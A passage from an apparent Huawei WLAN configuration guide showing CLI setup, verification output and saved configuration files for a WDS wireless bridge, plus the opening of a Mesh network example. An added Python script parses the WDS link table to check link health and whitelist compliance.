allow packets from VLAN 100 and VLAN 101 to pass through, and enable port isolation on GE0/0/1 so that access ports in the same isolation group cannot exchange Layer 2 traffic with each other directly.
<HUAWEI> system-view
[HUAWEI] sysname Switch_B
[Switch_B] vlan batch 100 to 101
[Switch_B] interface gigabitEthernet 0/0/1
[Switch_B-GigabitEthernet0/0/1] port link-type trunk
[Switch_B-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_B-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101
[Switch_B-GigabitEthernet0/0/1] port-isolate enable
[Switch_B-GigabitEthernet0/0/1] quit
[Switch_B] interface gigabitEthernet 0/0/2
[Switch_B-GigabitEthernet0/0/2] port link-type trunk
[Switch_B-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 to 101
[Switch_B-GigabitEthernet0/0/2] quit

# Configure aggregation switch Switch_A. Configure GE0/0/1 to allow packets from VLAN
100 and VLAN 101 to pass through, GE0/0/2 to allow packets from VLAN 100 to pass
through, and GE0/0/3 to allow packets from VLAN 101 to pass through.
<HUAWEI> system-view
[HUAWEI] sysname Switch_A
[Switch_A] vlan batch 100 to 101
[Switch_A] interface gigabitEthernet 0/0/1
[Switch_A-GigabitEthernet0/0/1] port link-type trunk
[Switch_A-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101
[Switch_A-GigabitEthernet0/0/1] quit
[Switch_A] interface gigabitEthernet 0/0/2
[Switch_A-GigabitEthernet0/0/2] port link-type trunk
[Switch_A-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/2] quit
[Switch_A] interface gigabitEthernet 0/0/3

[Switch_A-GigabitEthernet0/0/3] port link-type trunk


[Switch_A-GigabitEthernet0/0/3] port trunk allow-pass vlan 101
[Switch_A-GigabitEthernet0/0/3] quit

# Configure GE1/0/1 of the AC to allow packets from VLAN 100 to pass through.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 to 101
[AC] interface gigabitEthernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

# Configure access switch Switch_C. Configure GE0/0/1 and GE0/0/2 to allow packets from
the service and management VLANs to pass through.
<HUAWEI> system-view
[HUAWEI] sysname Switch_C
[Switch_C] vlan batch 100 to 101
[Switch_C] interface gigabitEthernet 0/0/1
[Switch_C-GigabitEthernet0/0/1] port link-type trunk
[Switch_C-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101
[Switch_C-GigabitEthernet0/0/1] quit
[Switch_C] interface gigabitEthernet 0/0/2
[Switch_C-GigabitEthernet0/0/2] port link-type trunk
[Switch_C-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 to 101
[Switch_C-GigabitEthernet0/0/2] quit

Step 2 Configure Switch_A to assign IP addresses to STAs and the AC to assign IP addresses to APs.

# Configure Switch_A as a DHCP server to assign IP addresses to STAs from an interface address pool.

[Switch_A] dhcp enable


[Switch_A] interface vlanif 101
[Switch_A-Vlanif101] ip address 10.23.101.1 24
[Switch_A-Vlanif101] dhcp select interface
[Switch_A-Vlanif101] quit

# Enable the DHCP function on the AC to allow it to assign IP addresses to APs from an
interface address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit

Step 3 Configure the AP groups, country code, and AC's source interface.

# Create AP group wds-root1 and AP group wds-root2 for root APs and AP group wds-leaf1
and AP group wds-leaf2 for leaf APs.
[AC] wlan
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] quit
[AC-wlan-view] ap-group name wds-root2
[AC-wlan-ap-group-wds-root2] quit
[AC-wlan-view] ap-group name wds-leaf1
[AC-wlan-ap-group-wds-leaf1] quit
[AC-wlan-view] ap-group name wds-leaf2
[AC-wlan-ap-group-wds-leaf2] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP groups.

[AC-wlan-view] regulatory-domain-profile name domain1


[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-wds-root1] quit
[AC-wlan-view] ap-group name wds-root2
[AC-wlan-ap-group-wds-root2] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-wds-root2] quit
[AC-wlan-view] ap-group name wds-leaf1
[AC-wlan-ap-group-wds-leaf1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-wds-leaf1] quit
[AC-wlan-view] ap-group name wds-leaf2
[AC-wlan-ap-group-wds-leaf2] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-wds-leaf2] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Add AP_1 to AP group wds-root1, AP_3 to AP group wds-root2, AP_2 to AP group wds-
leaf1, and AP_4 to AP group wds-leaf2.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1.

[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 1 ap-mac 60de-4474-9640
[AC-wlan-ap-1] ap-name AP_1
[AC-wlan-ap-1] ap-group wds-root1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit
[AC-wlan-view] ap-id 2 ap-mac dcd2-fc04-b500
[AC-wlan-ap-2] ap-name AP_2
[AC-wlan-ap-2] ap-group wds-leaf1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-2] quit
[AC-wlan-view] ap-id 3 ap-mac dcd2-fcf6-76a0
[AC-wlan-ap-3] ap-name AP_3
[AC-wlan-ap-3] ap-group wds-root2
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-3] quit
[AC-wlan-view] ap-id 4 ap-mac 60de-4476-e360
[AC-wlan-ap-4] ap-name AP_4
[AC-wlan-ap-4] ap-group wds-leaf2
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-4] quit

Step 4 Configure WDS service parameters.

# Configure radio parameters for WDS nodes. This example uses radio 1 of the AP6010DN-
AGN. coverage distance indicates the radio coverage distance parameter. By default, the
radio coverage distance parameter is 3 (unit: 100 meters). In this example, the radio coverage
distance parameter is set to 4. You can configure the parameter according to actual situations.
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] radio 1
[AC-wlan-group-radio-wds-root1/1] channel 40mhz-plus 157 //Configure the
channel and bandwidth for WDS links. All WDS links on the same WDS network must
be configured with the same channel and bandwidth.
[AC-wlan-group-radio-wds-root1/1] coverage distance 4 //After the radio
coverage distance parameter is configured based on distances between APs, the APs
will automatically adjust the values of slottime, acktimeout, and ctstimeout
based on the configured distance parameter.
[AC-wlan-group-radio-wds-root1/1] quit
[AC-wlan-ap-group-wds-root1] quit
[AC-wlan-view] ap-group name wds-root2
[AC-wlan-ap-group-wds-root2] radio 1
[AC-wlan-group-radio-wds-root2/1] channel 40mhz-plus 149
[AC-wlan-group-radio-wds-root2/1] coverage distance 4
[AC-wlan-group-radio-wds-root2/1] quit
[AC-wlan-ap-group-wds-root2] quit
[AC-wlan-view] ap-group name wds-leaf1
[AC-wlan-ap-group-wds-leaf1] radio 1
[AC-wlan-group-radio-wds-leaf1/1] channel 40mhz-plus 157
[AC-wlan-group-radio-wds-leaf1/1] coverage distance 4
[AC-wlan-group-radio-wds-leaf1/1] quit
[AC-wlan-ap-group-wds-leaf1] quit
[AC-wlan-view] ap-group name wds-leaf2
[AC-wlan-ap-group-wds-leaf2] radio 1
[AC-wlan-group-radio-wds-leaf2/1] channel 40mhz-plus 149
[AC-wlan-group-radio-wds-leaf2/1] coverage distance 4
[AC-wlan-group-radio-wds-leaf2/1] quit
[AC-wlan-ap-group-wds-leaf2] quit

# Configure the security profile wds-sec used by WDS links. The wds-sec uses the security
policy WPA2+PSK+AES. The pre-shared key is what authenticates the bridging APs to each other and protects the bridged service VLAN, so replace the sample passphrase a1234567 with a long, random one in a real deployment; the AC stores it in the configuration file in encrypted form (shown as %^%#...%^%#), not in plain text.
[AC-wlan-view] security-profile name wds-sec
[AC-wlan-sec-prof-wds-sec] security wpa2 psk pass-phrase a1234567 aes
[AC-wlan-sec-prof-wds-sec] quit

# Configure a WDS whitelist. Configure the WDS whitelist wds-list1 bound to AP_1 to
permit access only from AP_2. Configure the WDS whitelist wds-list2 bound to AP_3 to
permit access only from AP_4. A whitelist filters by peer AP MAC address only and limits which APs may attempt to bridge; the PSK in wds-sec is what actually authenticates the peer, so both controls are needed.
[AC-wlan-view] wds-whitelist-profile name wds-list1
[AC-wlan-wds-whitelist-wds-list1] peer-ap mac dcd2-fc04-b500
[AC-wlan-wds-whitelist-wds-list1] quit
[AC-wlan-view] wds-whitelist-profile name wds-list2
[AC-wlan-wds-whitelist-wds-list2] peer-ap mac 60de-4476-e360
[AC-wlan-wds-whitelist-wds-list2] quit

# Configure the WDS profile wds-net1. Set the WDS name to wds-net and WDS mode to
root. Apply the security profile wds-sec and allow packets from service VLAN 101 to pass
through in tagged mode.
[AC-wlan-view] wds-profile name wds-net1
[AC-wlan-wds-prof-wds-net1] wds-name wds-net //Only WDS VAPs with the same
WDS name can set up WDS links.
[AC-wlan-wds-prof-wds-net1] wds-mode root

[AC-wlan-wds-prof-wds-net1] security-profile wds-sec


[AC-wlan-wds-prof-wds-net1] vlan tagged 101
[AC-wlan-wds-prof-wds-net1] quit

# Configure the WDS profile wds-net2. Set the WDS name to wds-net and WDS mode to
root. Apply the security profile wds-sec and allow packets from service VLAN 101 to pass
through in tagged mode.
[AC-wlan-view] wds-profile name wds-net2
[AC-wlan-wds-prof-wds-net2] wds-name wds-net
[AC-wlan-wds-prof-wds-net2] wds-mode root
[AC-wlan-wds-prof-wds-net2] security-profile wds-sec
[AC-wlan-wds-prof-wds-net2] vlan tagged 101
[AC-wlan-wds-prof-wds-net2] quit

# Configure the WDS profile wds-net3. Set the WDS name to wds-net and WDS mode to
leaf. Bind the security profile wds-sec to the WDS profile, allowing packets from service
VLAN 101 to pass through in tagged mode.
[AC-wlan-view] wds-profile name wds-net3
[AC-wlan-wds-prof-wds-net3] wds-name wds-net
[AC-wlan-wds-prof-wds-net3] wds-mode leaf
[AC-wlan-wds-prof-wds-net3] security-profile wds-sec
[AC-wlan-wds-prof-wds-net3] vlan tagged 101
[AC-wlan-wds-prof-wds-net3] quit

# Bind the WDS whitelist wds-list1 to radio 1 in AP group wds-root1 to permit access only
from AP_2. Bind the WDS whitelist wds-list2 to radio 1 in AP group wds-root2 to permit
access only from AP_4.
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] radio 1
[AC-wlan-group-radio-wds-root1/1] wds-whitelist-profile wds-list1
[AC-wlan-group-radio-wds-root1/1] quit
[AC-wlan-ap-group-wds-root1] quit
[AC-wlan-view] ap-group name wds-root2
[AC-wlan-ap-group-wds-root2] radio 1
[AC-wlan-group-radio-wds-root2/1] wds-whitelist-profile wds-list2
[AC-wlan-group-radio-wds-root2/1] quit
[AC-wlan-ap-group-wds-root2] quit

Step 5 Configure the wired port profile used by the wired interface of AP_4 and set the wired
interface mode to endpoint. In this example, the PVID of the wired interface is set to VLAN
101 and the wired interface is added to VLAN 101 in tagged mode.
[AC-wlan-view] wired-port-profile name wired-port
[AC-wlan-wired-port-wired-port] mode endpoint
[AC-wlan-wired-port-wired-port] vlan pvid 101
[AC-wlan-wired-port-wired-port] vlan tagged 101
[AC-wlan-wired-port-wired-port] quit

Step 6 Bind required profiles to the AP groups to make WDS services take effect.
# Configure the AP group wds-root1 and bind the WDS profile wds-net1 to the group.
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] wds-profile wds-net1 radio 1

[AC-wlan-ap-group-wds-root1] quit

# Configure the AP group wds-root2 and bind the WDS profile wds-net2 to the group.
[AC-wlan-view] ap-group name wds-root2
[AC-wlan-ap-group-wds-root2] wds-profile wds-net2 radio 1

[AC-wlan-ap-group-wds-root2] quit

# Configure the AP group wds-leaf1 and bind the WDS profile wds-net3 to the group.

[AC-wlan-view] ap-group name wds-leaf1


[AC-wlan-ap-group-wds-leaf1] wds-profile wds-net3 radio 1

[AC-wlan-ap-group-wds-leaf1] quit

# Configure the AP group wds-leaf2, and bind the WDS profile wds-net3 and wired port
profile wired-port to the group.
[AC-wlan-view] ap-group name wds-leaf2
[AC-wlan-ap-group-wds-leaf2] wds-profile wds-net3 radio 1

[AC-wlan-ap-group-wds-leaf2] wired-port-profile wired-port gigabitethernet 0


[AC-wlan-ap-group-wds-leaf2] quit

Step 7 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the WDS service configuration.

# After the configuration is complete, run the display ap all command to check whether WDS
nodes go online successfully. If State displays as nor, APs have gone online successfully.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [4]
----------------------------------------------------------------------------------------------
ID MAC            Name Group     IP            Type         State STA Uptime
----------------------------------------------------------------------------------------------
1  60de-4474-9640 AP_1 wds-root1 10.23.100.250 AP6010DN-AGN nor   0   20M:16S
4  60de-4476-e360 AP_4 wds-leaf2 10.23.100.251 AP6010DN-AGN nor   0   17S
2  dcd2-fc04-b500 AP_2 wds-leaf1 10.23.100.253 AP6010DN-AGN nor   0   3M:55S
3  dcd2-fcf6-76a0 AP_3 wds-root2 10.23.100.252 AP6010DN-AGN nor   0   2M:55S
----------------------------------------------------------------------------------------------
Total: 4

Run the display wlan wds link all command to check information about the WDS links.
[AC-wlan-view] display wlan wds link all
Rf   : radio ID            Dis  : coverage distance(100m)
Ch   : channel             Per  : drop percent(%)
TSNR : total SNR(dB)       P-   : peer
WDS  : WDS mode            Re   : retry ratio(%)
RSSI : RSSI(dBm)           MaxR : max RSSI(dBm)
-------------------------------------------------------------------------------------------
APName  P-APName  Rf  Dis  Ch   WDS   P-Status  RSSI  MaxR  Per  Re  TSNR  SNR(Ch0~2:dB)
-------------------------------------------------------------------------------------------
AP_1    AP_2      1   3    157  root  normal    -44   -40   0    3   50    45/49/-
AP_2    AP_1      1   3    157  leaf  normal    -38   -36   0    49  57    36/31/57
AP_3    AP_4      1   3    149  root  normal    -11   -7    0    1   83    81/80/-
AP_4    AP_3      1   3    149  leaf  normal    -4    -4    0    0   91    90/85/-
-------------------------------------------------------------------------------------------
Total: 4

----End
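The display wlan wds link all output is the operational check of the whole WDS plan, and it is worth reading mechanically rather than by eye. The following Python script is an added example, not code or output from this Huawei document: it parses that table (the sample is constructed from the output above with its wrapped columns rejoined) and verifies that every link is normal, that each link has a reciprocal entry on the same channel, that every root is bridged only to a peer its whitelist allows (AP MACs and whitelist contents from Table 16-27 and Table 16-28), and that the coverage distance matches the plan; it also flags a high retry ratio, using a hypothetical 30% threshold. Run against the page's own output it reports two things a reviewer should notice: the 49% retry ratio on the AP_2 side of the first link, and a reported coverage distance of 3 on all four links although Step 4 sets 4.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed from the page's "display wlan wds link all" output (wrapped columns rejoined).
SAMPLE_OUTPUT = """\
Rf   : radio ID            Dis  : coverage distance(100m)
Ch   : channel             Per  : drop percent(%)
TSNR : total SNR(dB)       P-   : peer
WDS  : WDS mode            Re   : retry ratio(%)
RSSI : RSSI(dBm)           MaxR : max RSSI(dBm)
-------------------------------------------------------------------------------------------
APName  P-APName  Rf  Dis  Ch   WDS   P-Status  RSSI  MaxR  Per  Re  TSNR  SNR(Ch0~2:dB)
-------------------------------------------------------------------------------------------
AP_1    AP_2      1   3    157  root  normal    -44   -40   0    3   50    45/49/-
AP_2    AP_1      1   3    157  leaf  normal    -38   -36   0    49  57    36/31/57
AP_3    AP_4      1   3    149  root  normal    -11   -7    0    1   83    81/80/-
AP_4    AP_3      1   3    149  leaf  normal    -4    -4    0    0   91    90/85/-
-------------------------------------------------------------------------------------------
Total: 4
"""

# Expected values from the page's data plan: AP MACs (Table 16-27), the whitelist each root
# radio is bound to (Table 16-28) and the planned coverage distance parameter.
AP_MAC = {"AP_1": "60de-4474-9640", "AP_2": "dcd2-fc04-b500",
          "AP_3": "dcd2-fcf6-76a0", "AP_4": "60de-4476-e360"}
ROOT_WHITELIST: Dict[str, Set[str]] = {"AP_1": {"dcd2-fc04-b500"}, "AP_3": {"60de-4476-e360"}}
PLANNED_DISTANCE = 4
RETRY_WARN_PCT = 30  # hypothetical threshold; tune to the link budget of the site


@dataclass
class WdsLink:
    ap: str
    peer: str
    radio: int
    distance: int
    channel: int
    mode: str
    status: str
    rssi: int
    max_rssi: int
    drop_pct: int
    retry_pct: int
    total_snr: int


ROW_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(root|middle|leaf)\s+(\S+)"
    r"\s+(-?\d+)\s+(-?\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+\S+$")


def parse_wds_links(text: str) -> List[WdsLink]:
    """One WdsLink per data row; legend, header, rule and Total lines do not match ROW_RE."""
    links = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            f = m.groups()
            links.append(WdsLink(f[0], f[1], int(f[2]), int(f[3]), int(f[4]), f[5], f[6],
                                 int(f[7]), int(f[8]), int(f[9]), int(f[10]), int(f[11])))
    return links


def check_wds_links(links: List[WdsLink]) -> List[str]:
    """Return human-readable findings; an empty list means the bridge matches the plan."""
    findings = []
    by_pair = {(l.ap, l.peer): l for l in links}
    for l in links:
        if l.status != "normal":
            findings.append(f"{l.ap}->{l.peer}: link status is {l.status}")
        back = by_pair.get((l.peer, l.ap))
        if back is None:
            findings.append(f"{l.ap}->{l.peer}: no reciprocal link entry from {l.peer}")
        elif back.channel != l.channel:
            findings.append(f"{l.ap}->{l.peer}: channel {l.channel} differs from peer's {back.channel}")
        if l.mode == "root" and AP_MAC.get(l.peer) not in ROOT_WHITELIST.get(l.ap, set()):
            findings.append(f"{l.ap}: root bridged to {l.peer}, which is not in its whitelist")
        if l.distance != PLANNED_DISTANCE:
            findings.append(f"{l.ap}->{l.peer}: coverage distance {l.distance} differs from planned {PLANNED_DISTANCE}")
        if l.retry_pct > RETRY_WARN_PCT:
            findings.append(f"{l.ap}->{l.peer}: retry ratio {l.retry_pct}% exceeds {RETRY_WARN_PCT}%")
    return findings


if __name__ == "__main__":
    for finding in check_wds_links(parse_wds_links(SAMPLE_OUTPUT)) or ["no findings"]:
        print(finding)
```

A link whose root is bridged to a peer outside its whitelist, or whose status is not normal, is the condition to alert on; the retry and distance findings are tuning hints rather than security events.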

Configuration Files
l Switch_A configuration file
#
sysname Switch_A
#
vlan batch 100 to 101
#
dhcp enable
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 to 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 101
#
return

l Switch_B configuration file


#
sysname Switch_B
#
vlan batch 100 to 101
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 to 101
port-isolate enable group 1
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100 to 101
#
return

l Switch_C configuration file


#
sysname Switch_C
#
vlan batch 100 to 101
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 to 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100 to 101
#
return

l AC configuration file

#
sysname AC
#
vlan batch 100 to 101
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
capwap source interface vlanif100
#
wlan

security-profile name wds-sec
security wpa2 psk pass-phrase %^%#n}5+DgC3wLB.hJ34j5;*QMv<8"9#{Bq@ghBI3L9K%^%# aes
wds-whitelist-profile name wds-list1
peer-ap mac dcd2-fc04-b500
wds-whitelist-profile name wds-list2
peer-ap mac 60de-4476-e360
wds-profile name wds-net1
security-profile wds-sec
vlan tagged 101
wds-name wds-net
wds-mode root
wds-profile name wds-net2
security-profile wds-sec
vlan tagged 101
wds-name wds-net
wds-mode root
wds-profile name wds-net3
security-profile wds-sec
vlan tagged 101
wds-name wds-net
regulatory-domain-profile name domain1
wired-port-profile name wired-port
mode endpoint
vlan pvid 101
vlan tagged 101
ap-group name wds-leaf1
regulatory-domain-profile domain1
radio 1
wds-profile wds-net3
channel 40mhz-plus 157
coverage distance 4
ap-group name wds-leaf2
wired-port-profile wired-port gigabitethernet 0
regulatory-domain-profile domain1
radio 1
wds-profile wds-net3
channel 40mhz-plus 149
coverage distance 4
ap-group name wds-root1
regulatory-domain-profile domain1
radio 1
wds-profile wds-net1
wds-whitelist-profile wds-list1
channel 40mhz-plus 157
coverage distance 4
ap-group name wds-root2
regulatory-domain-profile domain1
radio 1
wds-profile wds-net2
wds-whitelist-profile wds-list2
channel 40mhz-plus 149
coverage distance 4
ap-id 1 type-id 19 ap-mac 60de-4474-9640 ap-sn 210235554710CB000042
ap-name AP_1
ap-group wds-root1
ap-id 2 type-id 19 ap-mac dcd2-fc04-b500 ap-sn 210235555310CC000094
ap-name AP_2
ap-group wds-leaf1
ap-id 3 type-id 19 ap-mac dcd2-fcf6-76a0 ap-sn 210235419610D2000097
ap-name AP_3
ap-group wds-root2
ap-id 4 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235557610DB000046
ap-name AP_4
ap-group wds-leaf2
#
return

16.12 Example for Configuring the WLAN Service Using Mesh Technology
Mesh Overview
Mesh is short for wireless Mesh network (WMN), a network of APs that are wirelessly connected in a Mesh topology.

On a traditional WLAN, APs connect to the AC over wired uplinks. Wired deployment is costly where network cables are hard to run, for example in tunnels and at docks. In such areas, Mesh technology can be used to deploy a wireless network quickly. A Mesh network is configured dynamically and automatically, so Mesh nodes can be added or removed flexibly. Mesh links between APs are also redundant, so the failure of a single node does not affect the entire network, which improves network robustness.

A Mesh network has two types of nodes:


l Mesh portal point (MPP): a Mesh point that connects the Mesh network to other types of
networks. This node provides the portal function to allow Mesh nodes to communicate
with external networks.
l Mesh point (MP): a Mesh-capable node that uses IEEE 802.11 MAC and physical layer
protocols for wireless communication. This node supports automatic topology discovery,
automatic route discovery, and data packet forwarding. MPs can provide both Mesh
service and user access service.

Both WDS and Mesh technologies can implement wireless bridging between APs. A WDS
network supports a maximum of three hops (for example, a WDS link established along a root
node, a middle node, and a leaf node is a three-hop link), whereas a Mesh network supports a
maximum of eight hops. A WDS network has a tree topology and does not support link
redundancy between nodes. A Mesh network has a Mesh topology and supports link
redundancy between nodes. Therefore, a Mesh network is more reliable than a WDS network.
You can choose WDS or Mesh technology to deploy wireless bridging between APs
according to your needs.

Configuration Notes
l The AP2030DN, AP7030DE, AP9330DN, AP6310SN-GN and AP2010DN do not
support the Mesh function.
l On a WDS or Mesh network, an 802.11ac AP cannot interoperate with non-802.11ac
APs regardless of the radio types used by the AP. Only 802.11ac APs can interoperate
with each other.
NOTE
Among all WDS- or Mesh-capable APs, the AP4030DN, AP4130DN, AP5030DN, AP8030DN,
AP8130DN, and AP5130DN are 802.11ac APs.

l If radio 0 of the AP8130DN is configured to work on the 5 GHz frequency band and
used for WDS or Mesh services, the software version of the AP connected to the
AP8130DN must be V200R005C10 or later.
l It is recommended that you deploy no more than 40 Mesh nodes on a Mesh network.
l WDS and Mesh technologies cannot be used on the same network.
l If WDS and Mesh services are configured on an AP radio, WIDS, spectrum analysis, or
WLAN location on the radio does not take effect.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and later (including V200R009, which this example uses), run the capwap source interface { loopback loopback-number | vlanif vlan-id } command in the system view.
l The following table lists applicable products and versions.

Table 16-29 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R009C00 | S12700 | V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN, AP3030DN, AP9131DN, AP9132DN, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
 | | V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN, AP3030DN, AP9131DN, AP9132DN
 | | V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP5030DN, AP5130DN, AP8130DN, AP8030DN, AP4030DN, AP4130DN

Networking Requirements
An enterprise has three areas: Area A, Area B, and Area C. Because of the geographical conditions, the AP in Area A can be deployed in wired mode, but wired deployment of APs is costly in Area B and Area C. The enterprise requires that APs be deployed in Area B and Area C at low cost.

As shown in Figure 16-13, a Mesh network is deployed to connect AP_2 and AP_3 to AP_1
through Mesh links, which can reduce network construction cost.

Figure 16-13 Mesh networking diagram

Data Plan
Before configuring the Mesh service, determine the types and MAC addresses of the APs
used as Mesh nodes. The following table provides the data plan for this example.

NOTE
The APs used in this example are AP6010DN-AGN.

Table 16-30 AP data required for completing the configuration

AP Type MAC

AP_1 AP6010DN-AGN 60de-4474-9640

AP_2 AP6010DN-AGN 60de-4476-e360

AP_3 AP6010DN-AGN dcd2-fcf6-76a0

The following provides data planning for Mesh service configuration.

Table 16-31 Data required for completing the configuration

Item | Data
Management VLAN for APs | VLAN 100
DHCP server | The AC functions as a DHCP server to allocate IP addresses to APs. Address pool: 10.23.100.2-10.23.100.254/24
AC's source interface | VLANIF 100: 10.23.100.1/24
Mesh profile name | Name: mesh-net
Mesh role | AP_1: Mesh-portal (MPP); AP_2: Mesh-node (MP); AP_3: Mesh-node (MP)
Mesh ID | Name: mesh-net
Mesh whitelist | Name: mesh-list
AP system profile | Name: mesh-sys
Radio used by Mesh services | Radio 1: bandwidth 40mhz-plus; channel 157; radio coverage distance parameter 4 (unit: 100 m)
Security profile | Name: mesh-sec; security policy: WPA2+PSK+AES; password type: PASS-PHRASE; password: a1234567
AP group | mesh-mpp: AP_1; mesh-mp: AP_2 and AP_3

Configuration Roadmap
1. Configure network connectivity and enable the AP (MPP) in Area A to go online on the
AC in wired mode.
2. Configure Mesh services to enable APs (MPs) in Area B and Area C to go online on the
AC through Mesh links.

Procedure
Step 1 Configure the AC to communicate with AP_1.
# Configure access switch Switch_A. Add GE0/0/1 to VLAN 100 (management VLAN) and
set the PVID of the interface to VLAN 100. Configure GE0/0/1 and GE0/0/2 to allow packets
from VLAN 100 to pass through.

<HUAWEI> system-view
[HUAWEI] sysname Switch_A
[Switch_A] vlan batch 100
[Switch_A] interface gigabitEthernet 0/0/1
[Switch_A-GigabitEthernet0/0/1] port link-type trunk
[Switch_A-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_A-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/1] port-isolate enable
[Switch_A-GigabitEthernet0/0/1] quit
[Switch_A] interface gigabitEthernet 0/0/2
[Switch_A-GigabitEthernet0/0/2] port link-type trunk
[Switch_A-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[Switch_A-GigabitEthernet0/0/2] quit

# Configure aggregation switch Switch_B. Configure GE0/0/1 and GE0/0/2 to allow packets
from VLAN 100 to pass through.
<HUAWEI> system-view
[HUAWEI] sysname Switch_B
[Switch_B] vlan batch 100
[Switch_B] interface gigabitEthernet 0/0/1
[Switch_B-GigabitEthernet0/0/1] port link-type trunk
[Switch_B-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[Switch_B-GigabitEthernet0/0/1] quit
[Switch_B] interface gigabitEthernet 0/0/2
[Switch_B-GigabitEthernet0/0/2] port link-type trunk
[Switch_B-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[Switch_B-GigabitEthernet0/0/2] quit

# Configure GE1/0/1 that connects the AC to the aggregation switch to allow packets from
VLAN 100 to pass through.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitEthernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

